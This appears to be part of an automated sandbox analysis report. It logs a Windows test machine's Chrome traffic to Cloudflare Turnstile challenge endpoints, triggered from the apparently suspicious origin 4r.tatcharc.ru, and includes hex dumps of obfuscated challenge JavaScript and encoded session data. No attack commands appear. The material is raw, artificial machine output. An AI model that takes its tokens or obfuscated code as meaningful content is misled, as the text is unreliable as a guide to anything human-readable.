                                                                                                        2024-12-18 17:49:13 UTC1369INData Raw: 66 29 2c 33 32 29 29 2c 65 4d 5b 69 6d 28 35 33 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 6f 2c 69 2c 6a 2c 6b 29 7b 28 69 6f 3d 69 6d 2c 65 5b 69 6f 28 31 31 38 33 29 5d 21 3d 3d 69 6f 28 36 31 36 29 29 3f 65 4d 5b 69 6f 28 31 36 33 35 29 5d 26 26 28 65 4d 5b 69 6f 28 31 32 36 32 29 5d 5b 69 6f 28 31 34 30 33 29 5d 28 29 2c 65 4d 5b 69 6f 28 31 32 36 32 29 5d 5b 69 6f 28 31 32 33 36 29 5d 28 29 2c 65 4d 5b 69 6f 28 31 31 30 34 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 65 5b 69 6f 28 39 33 38 29 5d 5d 5b 69 6f 28 33 30 30 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 69 6f 28 31 30 34 34 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 69 6f 28 36 33 37 29 5d 5b 69 6f 28 39 34 37 29 5d 2c 27 65 76 65 6e 74 27 3a 69 6f 28 33 36 39 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65
                                                                                                        Data Ascii: f),32)),eM[im(539)](function(io,i,j,k){(io=im,e[io(1183)]!==io(616))?eM[io(1635)]&&(eM[io(1262)][io(1403)](),eM[io(1262)][io(1236)](),eM[io(1104)]=!![],eM[e[io(938)]][io(300)]({'source':io(1044),'widgetId':eM[io(637)][io(947)],'event':io(369),'cfChlOut':e
                                                                                                        2024-12-18 17:49:13 UTC1369INData Raw: 70 28 38 34 39 29 2c 6c 29 2c 69 70 28 35 36 36 29 29 2b 31 2b 69 70 28 31 32 32 30 29 2c 65 4d 5b 69 70 28 36 33 37 29 5d 5b 69 70 28 36 32 30 29 5d 29 2c 27 2f 27 29 2b 65 4d 5b 69 70 28 36 33 37 29 5d 2e 63 48 2b 27 2f 27 2c 65 4d 5b 69 70 28 36 33 37 29 5d 5b 69 70 28 37 35 35 29 5d 29 2c 6e 3d 7b 7d 2c 6e 5b 69 70 28 38 35 38 29 5d 3d 65 4d 5b 69 70 28 36 33 37 29 5d 5b 69 70 28 38 35 38 29 5d 2c 6e 5b 69 70 28 31 32 30 39 29 5d 3d 65 4d 5b 69 70 28 36 33 37 29 5d 5b 69 70 28 31 32 30 39 29 5d 2c 6e 5b 69 70 28 34 35 32 29 5d 3d 65 4d 5b 69 70 28 36 33 37 29 5d 5b 69 70 28 34 35 32 29 5d 2c 6e 5b 69 70 28 33 35 38 29 5d 3d 65 4d 5b 69 70 28 36 33 37 29 5d 5b 69 70 28 33 33 32 29 5d 2c 6f 3d 6e 2c 73 3d 6e 65 77 20 65 4d 5b 28 69 70 28 31 36 33 32 29
                                                                                                        Data Ascii: p(849),l),ip(566))+1+ip(1220),eM[ip(637)][ip(620)]),'/')+eM[ip(637)].cH+'/',eM[ip(637)][ip(755)]),n={},n[ip(858)]=eM[ip(637)][ip(858)],n[ip(1209)]=eM[ip(637)][ip(1209)],n[ip(452)]=eM[ip(637)][ip(452)],n[ip(358)]=eM[ip(637)][ip(332)],o=n,s=new eM[(ip(1632)


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        15192.168.2.749811104.18.95.414439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:13 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2000292729:1734542240:X0lCKVmzbenQfrsiKz-FVaH0wGrZC2Dr08uWAScPXbQ/8f40fce70d2b43c1/V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 3202
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        CF-Chl-RetryAttempt: 0
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:13 UTC3202OUTData Raw: 76 5f 38 66 34 30 66 63 65 37 30 64 32 62 34 33 63 31 3d 37 45 71 6d 24 6d 61 6d 56 6d 31 6d 6c 6d 4b 4e 55 57 4e 55 72 70 4d 72 4d 49 53 6b 4d 53 55 4d 70 66 49 64 4d 56 66 55 79 4e 55 66 64 39 55 63 54 6d 64 33 78 72 54 33 24 43 45 4d 6a 55 52 70 61 64 55 50 61 6d 55 48 41 55 53 67 32 55 6b 36 70 55 49 71 43 6d 79 54 55 32 6d 61 24 36 55 6c 4e 33 61 4b 55 44 6d 63 61 53 4e 70 70 7a 54 6e 55 56 55 61 72 43 55 6c 6e 54 33 62 4c 41 49 4a 72 6b 4d 58 4f 62 44 72 55 44 61 70 52 39 55 30 55 78 64 55 61 33 71 69 57 31 59 31 78 33 55 69 42 52 62 65 66 70 33 4b 4b 4e 24 4b 56 33 4d 44 31 4e 55 39 42 6d 55 50 55 24 4c 54 78 31 6d 46 52 79 61 55 78 33 4d 5a 55 78 54 30 57 6d 30 5a 78 33 55 4c 44 55 55 37 57 69 45 69 55 78 48 55 57 69 39 55 53 70 33 6c 72 38 59 38
                                                                                                        Data Ascii: v_8f40fce70d2b43c1=7Eqm$mamVm1mlmKNUWNUrpMrMISkMSUMpfIdMVfUyNUfd9UcTmd3xrT3$CEMjURpadUPamUHAUSg2Uk6pUIqCmyTU2ma$6UlN3aKUDmcaSNppzTnUVUarCUlnT3bLAIJrkMXObDrUDapR9U0UxdUa3qiW1Y1x3UiBRbefp3KKN$KV3MD1NU9BmUPU$LTx1mFRyaUx3MZUxT0Wm0Zx3ULDUU7WiEiUxHUWi9USp3lr8Y8
                                                                                                        2024-12-18 17:49:14 UTC779INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 17:49:13 GMT
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Content-Length: 152428
                                                                                                        Connection: close
                                                                                                        cf-chl-gen: E6roiMgt5Jr3rC4mKY91fWNSPi7lZpQs1cBWl51ezkOdF6osOQPQ4GNkiCyg/eT54TsbhHY98nZ41x+i2cxiyl9Peq8GfhcQm9BNOWlyud8O5sHkeBQhzont4tRKvfRX2Iw5Nqss8KTQ+GDwIiYtbLgjboUDrFi46NwDVE1s6kSRMA3B5hbZrI171qtNss+x6ncJ1SidNaSHsnyKfpLi2M0zG+4tWXUa6Ijojk3ekivDCA3jebSd4eBMngga7Ps4VVabAMbXkoJQjsve0/w2wwcdQxhkNkul8sw7n84gY6SWX2hBoXhM1f9h8Z6Egye1efuwfOHQZwk/YKY8ZGhVZmZtHHKD65sgJM7hw4RpkA5pEoIPg3D+MYRupfX1V3LhAND6WYkrSLgrG2qNTWiU6fS/JGAQilz88WzgJVzd1Z4e7J+Wa6HLMtgfJnaLIQdfJ70E+zD9WfOhesaU9zVrMAte6rbn1JGcnhh6suZkusVlPcgwrNAqK2/3/hMKZ1Z/DEl6A3AMMdWXUtTG$nlRvvgkg17KFlU8T
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f40fd016e859e02-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 17:49:14 UTC590INData Raw: 5a 48 64 47 6a 55 68 72 66 49 31 6c 68 55 69 45 63 6d 39 36 57 35 64 76 68 70 69 57 69 61 4a 61 65 59 5a 2b 58 70 78 68 71 57 4f 47 65 5a 32 70 71 59 65 48 62 57 32 71 6b 4c 57 7a 69 34 69 4e 6b 37 75 7a 66 4a 36 58 65 59 4b 51 6a 5a 71 6d 74 34 65 57 6f 63 69 61 6f 36 75 72 69 4c 36 68 30 63 4c 46 77 5a 6a 48 72 71 53 70 32 70 32 39 6c 74 2f 67 72 72 43 31 34 4f 44 57 32 4b 6a 70 37 63 48 62 37 66 48 46 77 4c 4f 7a 79 63 48 59 73 4e 62 49 79 63 7a 4e 33 39 7a 59 39 63 4c 68 41 62 65 34 41 39 55 43 78 75 50 72 32 67 72 58 37 39 34 47 37 51 66 31 41 4e 54 4b 39 78 50 70 31 66 4c 71 2b 78 34 52 33 53 51 44 37 76 76 76 4b 4f 4c 34 33 66 30 74 36 52 30 45 2b 79 55 67 41 69 59 48 4a 77 2f 33 44 42 63 76 4c 2f 41 75 4c 51 73 55 48 52 4d 58 42 52 63 69 51 51 51
                                                                                                        Data Ascii: ZHdGjUhrfI1lhUiEcm96W5dvhpiWiaJaeYZ+XpxhqWOGeZ2pqYeHbW2qkLWzi4iNk7uzfJ6XeYKQjZqmt4eWociao6uriL6h0cLFwZjHrqSp2p29lt/grrC14ODW2Kjp7cHb7fHFwLOzycHYsNbIyczN39zY9cLhAbe4A9UCxuPr2grX794G7Qf1ANTK9xPp1fLq+x4R3SQD7vvvKOL43f0t6R0E+yUgAiYHJw/3DBcvL/AuLQsUHRMXBRciQQQ
                                                                                                        2024-12-18 17:49:14 UTC1369INData Raw: 55 2f 4b 42 67 62 43 53 70 49 4f 45 78 4f 4a 51 5a 42 55 6c 4d 76 53 52 59 6b 44 6a 52 4f 46 68 49 71 48 6a 35 64 58 44 77 30 50 56 45 6e 58 55 70 66 5a 6c 64 43 63 6d 46 46 5a 47 42 72 62 55 70 30 55 46 52 61 62 6d 78 58 56 54 34 35 66 6c 46 68 4f 45 56 2f 63 31 78 31 51 6f 69 42 66 6f 56 71 62 6d 61 4d 64 57 32 4b 55 48 4f 4c 64 56 70 54 65 4a 46 34 57 6e 65 43 57 31 78 30 64 57 53 63 71 61 61 6e 5a 35 65 43 67 4b 4b 47 73 6d 61 50 6a 5a 56 78 6f 37 57 61 76 49 71 39 76 5a 57 54 73 6e 75 53 6c 4c 53 33 77 35 66 49 78 63 71 6c 77 73 37 44 30 59 53 30 79 74 57 71 77 64 57 35 74 4b 79 62 72 74 57 72 75 62 65 37 6d 72 4c 52 70 4c 4f 30 31 36 72 70 34 63 4c 49 35 61 72 52 38 63 7a 42 33 75 50 4a 38 65 33 33 2b 73 58 57 32 2f 58 70 31 63 48 64 7a 66 4c 75 32
                                                                                                        Data Ascii: U/KBgbCSpIOExOJQZBUlMvSRYkDjROFhIqHj5dXDw0PVEnXUpfZldCcmFFZGBrbUp0UFRabmxXVT45flFhOEV/c1x1QoiBfoVqbmaMdW2KUHOLdVpTeJF4WneCW1x0dWScqaanZ5eCgKKGsmaPjZVxo7WavIq9vZWTsnuSlLS3w5fIxcqlws7D0YS0ytWqwdW5tKybrtWrube7mrLRpLO016rp4cLI5arR8czB3uPJ8e33+sXW2/Xp1cHdzfLu2
                                                                                                        2024-12-18 17:49:14 UTC1369INData Raw: 76 4d 42 46 42 49 55 77 6c 51 55 63 4b 53 79 68 4e 52 55 34 34 51 44 59 74 58 55 78 58 48 6b 41 39 5a 6a 4d 36 57 47 4e 64 4b 53 78 69 61 45 56 76 54 6d 63 7a 55 6c 6b 7a 51 6c 42 57 56 31 59 36 65 56 5a 63 65 56 4e 6c 68 58 52 43 52 46 31 64 68 56 68 66 5a 57 35 77 67 6e 74 63 61 70 43 46 6b 6d 74 4d 6d 35 56 2b 62 34 79 56 61 58 5a 56 62 6c 2b 41 6e 70 57 64 59 4b 57 4e 65 71 4f 6a 6a 49 56 74 6f 37 4b 51 61 4b 69 4f 6b 36 57 30 6a 49 5a 36 75 70 4f 58 6e 72 69 55 76 70 4b 59 6d 70 75 38 76 4a 2f 45 69 63 4b 68 71 63 53 38 31 4d 71 50 30 5a 61 75 6a 4e 43 6c 30 4e 36 6f 75 4e 50 52 76 4a 71 7a 70 4a 6e 70 6f 4c 58 68 6e 73 54 63 70 39 43 71 71 76 43 2b 34 71 7a 73 31 62 62 6c 36 72 66 49 41 4c 6e 35 31 37 6a 78 32 4f 4c 6e 32 39 72 6b 31 4d 6e 30 2f 64
                                                                                                        Data Ascii: vMBFBIUwlQUcKSyhNRU44QDYtXUxXHkA9ZjM6WGNdKSxiaEVvTmczUlkzQlBWV1Y6eVZceVNlhXRCRF1dhVhfZW5wgntcapCFkmtMm5V+b4yVaXZVbl+AnpWdYKWNeqOjjIVto7KQaKiOk6W0jIZ6upOXnriUvpKYmpu8vJ/EicKhqcS81MqP0ZaujNCl0N6ouNPRvJqzpJnpoLXhnsTcp9CqqvC+4qzs1bbl6rfIALn517jx2OLn29rk1Mn0/d
                                                                                                        2024-12-18 17:49:14 UTC1369INData Raw: 4c 31 56 48 4e 6b 6f 61 56 6a 45 57 47 30 6b 34 4b 68 6f 7a 57 54 55 68 5a 7a 4a 61 5a 53 73 6f 4c 54 64 4d 50 6d 45 7a 4d 56 52 53 5a 31 42 44 53 33 70 47 66 6c 68 34 63 31 56 32 58 55 39 68 54 6c 42 31 67 31 39 4b 62 45 74 4b 66 32 35 52 57 33 47 55 59 46 56 33 62 6e 70 77 57 31 74 70 6d 35 35 79 6e 33 36 57 6e 47 31 59 5a 34 65 41 64 47 6d 5a 66 34 32 70 68 47 2b 49 6a 47 74 77 69 5a 47 45 70 6f 57 61 72 35 4f 4f 70 36 32 35 65 37 2b 69 74 72 43 31 75 70 6e 47 76 73 65 38 7a 4c 65 78 7a 62 50 48 7a 70 44 53 73 4c 44 49 6c 61 61 71 74 4d 37 56 74 63 43 79 30 36 7a 62 70 63 4f 7a 78 63 72 56 33 74 6a 44 37 65 37 69 75 72 76 6c 39 65 48 6f 72 37 44 77 36 4f 37 71 79 38 65 2f 37 74 33 50 33 64 6e 79 30 74 58 7a 32 67 76 49 39 76 76 73 37 38 6b 4e 42 65 55
                                                                                                        Data Ascii: L1VHNkoaVjEWG0k4KhozWTUhZzJaZSsoLTdMPmEzMVRSZ1BDS3pGflh4c1V2XU9hTlB1g19KbEtKf25RW3GUYFV3bnpwW1tpm55yn36WnG1YZ4eAdGmZf42phG+IjGtwiZGEpoWar5OOp625e7+itrC1upnGvse8zLexzbPHzpDSsLDIlaaqtM7VtcCy06zbpcOzxcrV3tjD7e7iurvl9eHor7Dw6O7qy8e/7t3P3dny0tXz2gvI9vvs78kNBeU
                                                                                                        2024-12-18 17:49:14 UTC1369INData Raw: 6a 67 30 55 78 77 54 47 6b 4e 50 48 31 6b 35 51 6d 45 79 57 31 31 42 50 6d 63 36 52 32 56 6a 59 44 31 51 56 44 52 74 57 6a 4d 30 4e 46 46 61 58 54 68 42 55 47 4e 30 59 31 35 63 57 31 68 54 64 6f 5a 59 5a 30 74 67 58 59 46 2b 59 57 43 57 68 70 56 6e 69 49 5a 77 55 49 6c 7a 56 32 4a 36 65 4a 74 6d 67 5a 2b 69 66 59 4b 63 5a 70 64 74 6d 61 43 68 70 47 75 66 63 5a 47 74 6c 5a 4b 4f 65 62 4b 77 6a 4c 4b 36 73 61 75 66 76 4a 2f 42 71 63 4c 48 68 4c 79 38 76 63 53 4e 70 4d 47 30 31 62 4c 51 78 4e 66 49 32 38 4f 6b 73 64 61 58 73 61 6d 39 6e 62 6d 2b 76 39 6d 6f 74 38 57 6a 36 38 6a 47 76 64 43 78 35 37 4c 4d 38 4d 47 32 34 72 6a 51 75 66 33 37 36 41 48 4c 73 2f 66 32 38 4e 6b 48 34 38 58 54 43 74 73 41 32 64 76 4d 32 51 66 6d 43 4f 6f 50 38 68 48 34 31 50 55 47
                                                                                                        Data Ascii: jg0UxwTGkNPH1k5QmEyW11BPmc6R2VjYD1QVDRtWjM0NFFaXThBUGN0Y15cW1hTdoZYZ0tgXYF+YWCWhpVniIZwUIlzV2J6eJtmgZ+ifYKcZpdtmaChpGufcZGtlZKOebKwjLK6saufvJ/BqcLHhLy8vcSNpMG01bLQxNfI28OksdaXsam9nbm+v9mot8Wj68jGvdCx57LM8MG24rjQuf376AHLs/f28NkH48XTCtsA2dvM2QfmCOoP8hH41PUG
                                                                                                        2024-12-18 17:49:14 UTC1369INData Raw: 52 4d 54 31 70 68 57 43 5a 69 4a 47 56 63 4b 6d 56 49 51 6a 35 64 56 47 52 42 54 47 5a 75 55 6e 64 31 61 45 6c 31 50 6c 56 73 64 30 39 56 55 59 51 36 66 6b 43 47 51 6c 74 4d 51 59 5a 64 69 30 75 54 6c 49 74 7a 55 31 4a 76 56 46 61 59 57 35 43 58 58 46 35 2b 6f 32 4f 62 63 34 68 33 5a 4b 79 46 72 47 36 66 70 36 75 6b 6b 4c 56 72 70 6f 4a 33 6f 59 78 74 6b 4b 57 76 72 6f 6c 35 6e 72 71 78 75 4b 64 2b 6d 61 53 4a 6e 34 6a 49 76 4a 75 49 72 63 69 69 72 5a 50 47 70 4e 4c 42 6c 74 7a 55 31 4c 61 2f 30 37 6e 64 6e 61 36 30 78 63 2f 56 6f 72 57 72 7a 4d 71 74 32 64 6d 35 7a 2b 66 7a 36 4e 62 56 39 2b 58 53 75 39 66 2b 33 37 7a 57 32 50 50 30 37 4e 72 79 35 74 6e 48 39 64 6e 5a 78 64 37 6d 7a 51 6e 4a 43 64 54 6f 42 4d 6b 46 36 67 34 63 30 68 48 76 41 50 67 4e 32
                                                                                                        Data Ascii: RMT1phWCZiJGVcKmVIQj5dVGRBTGZuUnd1aEl1PlVsd09VUYQ6fkCGQltMQYZdi0uTlItzU1JvVFaYW5CXXF5+o2Obc4h3ZKyFrG6fp6ukkLVrpoJ3oYxtkKWvrol5nrqxuKd+maSJn4jIvJuIrciirZPGpNLBltzU1La/07ndna60xc/VorWrzMqt2dm5z+fz6NbV9+XSu9f+37zW2PP07Nry5tnH9dnZxd7mzQnJCdToBMkF6g4c0hHvAPgN2
                                                                                                        2024-12-18 17:49:14 UTC1369INData Raw: 53 54 45 6b 2b 4f 6b 5a 77 50 6b 38 71 63 54 4a 4d 4e 57 35 54 64 6a 4a 64 54 6c 5a 64 50 54 6c 4b 66 30 4a 4e 55 31 31 66 59 47 4a 6e 52 6e 74 36 62 49 75 4c 54 55 70 6f 63 56 46 72 55 32 4e 5a 66 49 36 4c 6a 6d 68 61 66 61 4e 6a 6b 5a 39 69 6f 47 65 41 68 6f 69 55 67 34 39 73 62 36 79 51 66 35 4b 42 64 61 65 41 69 71 75 73 69 48 32 74 6a 6f 36 7a 66 38 4b 78 6d 4d 61 34 70 38 47 2b 71 62 75 74 71 71 79 74 71 61 71 63 6b 4c 62 56 6b 4b 37 4f 7a 70 76 54 33 5a 65 35 6c 35 71 31 35 4e 4c 59 75 73 58 70 36 63 66 45 71 4f 36 71 37 38 54 49 76 65 7a 55 79 76 54 4e 78 2b 61 36 2b 50 6d 30 39 4d 2f 58 30 4e 34 41 31 66 41 48 77 50 75 37 2f 41 4c 71 33 41 58 76 37 74 6b 41 30 65 37 69 42 39 49 42 38 65 6e 79 44 39 6a 62 2f 66 72 65 34 65 7a 30 41 75 59 54 4a 2f
                                                                                                        Data Ascii: STEk+OkZwPk8qcTJMNW5TdjJdTlZdPTlKf0JNU11fYGJnRnt6bIuLTUpocVFrU2NZfI6LjmhafaNjkZ9ioGeAhoiUg49sb6yQf5KBdaeAiqusiH2tjo6zf8KxmMa4p8G+qbutqqytqaqckLbVkK7OzpvT3Ze5l5q15NLYusXp6cfEqO6q78TIvezUyvTNx+a6+Pm09M/X0N4A1fAHwPu7/ALq3AXv7tkA0e7iB9IB8enyD9jb/fre4ez0AuYTJ/
                                                                                                        2024-12-18 17:49:14 UTC1369INData Raw: 4c 6c 31 6f 61 33 56 4f 56 56 6c 6b 5a 47 39 48 63 46 45 36 57 47 31 41 66 30 4a 75 50 33 42 47 61 49 65 48 53 6f 6c 71 52 34 6d 4a 62 47 57 41 68 59 39 55 6b 49 65 51 6b 31 57 54 6d 4b 43 53 67 4a 70 72 6e 5a 39 6a 66 61 6d 62 59 57 47 64 71 6d 71 46 62 47 35 70 72 59 6d 48 68 5a 2b 6f 62 34 4f 50 64 62 4f 53 73 5a 70 39 6c 49 35 36 6f 4c 4b 52 78 37 61 47 68 71 47 6b 72 4b 2b 47 69 72 7a 49 78 4e 62 4f 31 4d 71 7a 71 72 48 50 32 62 61 2f 71 73 44 61 33 70 79 66 6e 4f 57 6b 34 38 65 70 78 75 4f 70 71 4f 47 6e 33 71 79 74 73 71 33 70 74 4f 50 74 2b 4e 6a 53 7a 4c 2f 34 76 4f 76 4d 74 76 4d 46 77 76 44 71 35 41 30 4a 42 38 62 72 45 65 45 53 35 75 6e 4d 42 39 41 44 43 68 44 5a 31 78 62 75 39 66 62 71 38 50 76 61 41 53 4c 35 47 52 6f 4b 33 65 50 33 46 78 76
                                                                                                        Data Ascii: Ll1oa3VOVVlkZG9HcFE6WG1Af0JuP3BGaIeHSolqR4mJbGWAhY9UkIeQk1WTmKCSgJprnZ9jfambYWGdqmqFbG5prYmHhZ+ob4OPdbOSsZp9lI56oLKRx7aGhqGkrK+GirzIxNbO1MqzqrHP2ba/qsDa3pyfnOWk48epxuOpqOGn3qytsq3ptOPt+NjSzL/4vOvMtvMFwvDq5A0JB8brEeES5unMB9ADChDZ1xbu9fbq8PvaASL5GRoK3eP3Fxv
                                                                                                        2024-12-18 17:49:14 UTC1369INData Raw: 57 52 33 5a 6c 4e 35 63 48 31 50 63 6e 55 2f 51 48 74 75 64 6f 52 36 56 6b 4e 70 56 6d 68 6d 58 48 79 4a 66 5a 46 39 67 57 65 4c 64 55 74 7a 67 35 74 6c 63 6f 6c 33 6f 6f 32 59 64 4a 4a 78 68 4b 53 49 5a 5a 64 72 62 5a 65 41 6d 36 57 43 68 58 79 4b 73 35 65 50 71 34 31 30 65 6f 79 4d 64 37 4e 7a 6d 38 4b 65 67 62 43 33 73 71 47 44 6c 49 57 69 6d 59 6d 77 7a 6f 54 4a 31 61 65 51 69 63 65 73 71 64 47 76 6e 64 32 32 71 4a 69 63 75 64 54 56 34 4d 6a 57 77 74 7a 41 31 64 33 4e 36 71 69 74 71 50 4c 41 74 61 32 77 34 39 6a 4e 35 2f 33 33 76 75 7a 7a 37 51 50 37 7a 74 76 55 2f 76 58 38 2b 2b 76 6a 31 73 6e 46 37 2b 63 50 38 65 58 6e 39 4f 48 6e 34 65 37 6b 44 52 33 70 30 51 72 5a 34 50 6e 65 4a 65 58 2b 48 68 37 71 42 52 58 35 46 79 49 64 43 67 45 70 45 51 34 71
                                                                                                        Data Ascii: WR3ZlN5cH1PcnU/QHtudoR6VkNpVmhmXHyJfZF9gWeLdUtzg5tlcol3oo2YdJJxhKSIZZdrbZeAm6WChXyKs5ePq410eoyMd7Nzm8KegbC3sqGDlIWimYmwzoTJ1aeQicesqdGvnd22qJicudTV4MjWwtzA1d3N6qitqPLAta2w49jN5/33vuzz7QP7ztvU/vX8++vj1snF7+cP8eXn9OHn4e7kDR3p0QrZ4PneJeX+Hh7qBRX5FyIdCgEpEQ4q


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        16192.168.2.74981335.190.80.14439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:14 UTC533OUTOPTIONS /report/v4?s=NK60VD7izjfkFcqHBZDOlRao%2Fj3PMbOBoyKjf%2FtNXQGaIWdPiCn9szmD1PFGjeP3eUoPI4wNhM0HP2i96pRps2cMjiBZLFbP6urmMvv%2BbzJzoe3UZIhqWOqT1frGig%3D%3D HTTP/1.1
                                                                                                        Host: a.nel.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Origin: https://4r.tatcharc.ru
                                                                                                        Access-Control-Request-Method: POST
                                                                                                        Access-Control-Request-Headers: content-type
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:15 UTC336INHTTP/1.1 200 OK
                                                                                                        Content-Length: 0
                                                                                                        access-control-max-age: 86400
                                                                                                        access-control-allow-methods: POST, OPTIONS
                                                                                                        access-control-allow-origin: *
                                                                                                        access-control-allow-headers: content-length, content-type
                                                                                                        date: Wed, 18 Dec 2024 17:49:14 GMT
                                                                                                        Via: 1.1 google
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        17192.168.2.749820104.18.95.414439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:16 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2000292729:1734542240:X0lCKVmzbenQfrsiKz-FVaH0wGrZC2Dr08uWAScPXbQ/8f40fce70d2b43c1/V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 3202
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        CF-Chl-RetryAttempt: 1
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:16 UTC3202OUTData Raw: 76 5f 38 66 34 30 66 63 65 37 30 64 32 62 34 33 63 31 3d 37 45 71 6d 24 6d 61 6d 56 6d 31 6d 6c 6d 4b 4e 55 57 4e 55 72 70 4d 72 4d 49 53 6b 4d 53 55 4d 70 66 49 64 4d 56 66 55 79 4e 55 66 64 39 55 63 54 6d 64 33 78 72 54 33 24 43 45 4d 6a 55 52 70 61 64 55 50 61 6d 55 48 41 55 53 67 32 55 6b 36 70 55 49 71 43 6d 79 54 55 32 6d 61 24 36 55 6c 4e 33 61 4b 55 44 6d 63 61 53 4e 70 70 7a 54 6e 55 56 55 61 72 43 55 6c 6e 54 33 62 4c 41 49 4a 72 6b 4d 58 4f 62 44 72 55 44 61 70 52 39 55 30 55 78 64 55 61 33 71 69 57 31 59 31 78 33 55 69 42 52 62 65 66 70 33 4b 4b 4e 24 4b 56 33 4d 44 31 4e 55 39 42 6d 55 50 55 24 4c 54 78 31 6d 46 52 79 61 55 78 33 4d 5a 55 78 54 30 57 6d 30 5a 78 33 55 4c 44 55 55 37 57 69 45 69 55 78 48 55 57 69 39 55 53 70 33 6c 72 38 59 38
                                                                                                        Data Ascii: v_8f40fce70d2b43c1=7Eqm$mamVm1mlmKNUWNUrpMrMISkMSUMpfIdMVfUyNUfd9UcTmd3xrT3$CEMjURpadUPamUHAUSg2Uk6pUIqCmyTU2ma$6UlN3aKUDmcaSNppzTnUVUarCUlnT3bLAIJrkMXObDrUDapR9U0UxdUa3qiW1Y1x3UiBRbefp3KKN$KV3MD1NU9BmUPU$LTx1mFRyaUx3MZUxT0Wm0Zx3ULDUU7WiEiUxHUWi9USp3lr8Y8
                                                                                                        2024-12-18 17:49:16 UTC779INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 17:49:16 GMT
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Content-Length: 152428
                                                                                                        Connection: close
